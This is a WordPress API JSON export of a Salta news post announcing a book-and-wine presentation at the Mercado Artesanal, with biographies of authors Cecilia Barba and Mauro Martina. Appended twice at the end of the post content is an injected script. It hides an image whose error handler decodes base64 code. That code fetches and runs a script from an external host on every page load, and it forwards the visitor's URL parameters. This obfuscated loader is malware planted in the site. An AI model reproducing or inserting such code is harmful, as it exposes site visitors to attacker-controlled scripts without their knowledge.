{"id":2498,"date":"2023-04-13T11:17:05","date_gmt":"2023-04-13T14:17:05","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2498"},"modified":"2025-08-14T00:19:16","modified_gmt":"2025-08-14T03:19:16","slug":"libros-y-vinos-en-el-mercado-artesanal-de-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2498","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/libros-y-vinos-en-el-mercado-artesanal-de-salta-88997\">Libros y vinos en el Mercado Artesanal de Salta<\/a>"},"content":{"rendered":"\n<h4 class=\"has-white-color has-vivid-cyan-blue-background-color has-text-color has-background wp-block-heading\"><em>Ma\u00f1ana viernes 14 de abril a las 19 horas, se presentar\u00e1n los libros Cuentos Blancos, Cuentos Negros de Cecilia Barba y El Perpetrador de Olvidos de Mauro Martina. Se compartir\u00e1 vinos y cervezas artesanales a los presentes. Entrada gratuita.<\/em><\/h4>\n\n\n\n<p>En forma conjunta el&nbsp;<strong>Mercado Artesanal de Salta<\/strong>&nbsp;con la Sociedad Argentina de Escritores filial Salta, llevar\u00e1n a cabo la iniciativa \u201cLibros y Vinos\u201d una propuesta que propicia un ambiente agradable de lectura que permitir\u00e1 al p\u00fablico emprender un viaje literario en el que el vino y el libro se unan para relajarse y disfrutar.<\/p>\n\n\n\n<p>La cita ser\u00e1 ma\u00f1ana viernes 14 de abril a las 19 horas en el Sal\u00f3n de Usos M\u00faltiples \u201cMar\u00eda Gertrudis Medeiros\u201d del Mercado Artesanal, Av. San Mart\u00edn 2555, con entrada gratuita.<\/p>\n\n\n\n<p>En esta oportunidad, Cecilia Ver\u00f3nica Barba presentar\u00e1 Cuentos Blancos, Cuentos Negros. La obra sugiere antagonismos inclaudicables, pero entre ellos existe toda una gama de colores que se entremezclan, donde la autora los mixtura para mostrarnos que todo es posible al momento de contar historias.<\/p>\n\n\n\n<p>Por su parte, Mauro Martina presentar\u00e1 El Perpetrador de Olvidos, donde lleva al lector a compartir la ventana a trav\u00e9s de la cual la vida, con su estruendo, le estalla en las pupilas. En cada uno de los t\u00edtulos de su obra, hombre y pasiones, quimeras y olvidos, fluyen y confluyen como los caprichos de un m\u00e1gico caleidoscopio. &nbsp;<\/p>\n\n\n\n<p>Acompa\u00f1an el evento, la Cooperativa de Productores Vitivin\u00edcolas Cafayate Bodega TRASSOLES, sal\u00f3n de venta y exposici\u00f3n n\u00famero 19 del Mercado Artesanal, y Cerveza Artesanal QOLQA.<\/p>\n\n\n\n<p><strong>Sobre los autores<\/strong><\/p>\n\n\n\n<p>Cecilia Ver\u00f3nica Barba, naci\u00f3 en Salta Capital. Empresaria, escritora y autora. Forma parte del Movimiento Po\u00e9tico Mundial, filial Salta. Integra el grupo literario \u00abCon Voz de Mujer\u00bb dedicado entre otras actividades culturales, a la creaci\u00f3n de antolog\u00edas y bibliotecas de autores salte\u00f1os. Distinguida \u00abHu\u00e9sped Grato\u00bb por el Gobierno Aut\u00f3nomo Municipal de Villaz\u00f3n en Bolivia 2019. Refundadora de la Sociedad Argentina de Escritores filial Salta. Actualmente integra la Comisi\u00f3n Directiva.<\/p>\n\n\n\n<p>Mauro Martina, naci\u00f3 en Salta Capital. Pas\u00f3 su infancia en San Antonio de los Cobres, su lugar en el mundo. Sostiene que la Puna acuna misterios e inmensidad y de ese periplo nacieron las letras que cant\u00f3 como una mirada de m\u00faltiples recuerdos, sentimientos y vivencias. Las tardes de lluvia, el azar y la lectura son sus paisajes preferidos. El desvelo y la desfachatez posibilitaron poemas, relatos y cuentos trazados hoy en sus libros.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/libros-y-vinos-en-el-mercado-artesanal-de-salta-88997\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ma\u00f1ana viernes 14 de abril a las 19 horas, se presentar\u00e1n los libros Cuentos Blancos, Cuentos Negros de Cecilia Barba y El Perpetrador de Olvidos de Mauro Martina. Se compartir\u00e1 vinos y cervezas artesanales a los presentes. Entrada gratuita. En forma conjunta el&nbsp;Mercado Artesanal de Salta&nbsp;con la Sociedad Argentina de Escritores filial Salta, llevar\u00e1n a [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2499,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[17],"tags":[],"class_list":{"0":"post-2498","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2498"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2498"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2498\/revisions"}],"predecessor-version":[{"id":7118,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2498\/revisions\/7118"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2499"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2498"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2498"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2498"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}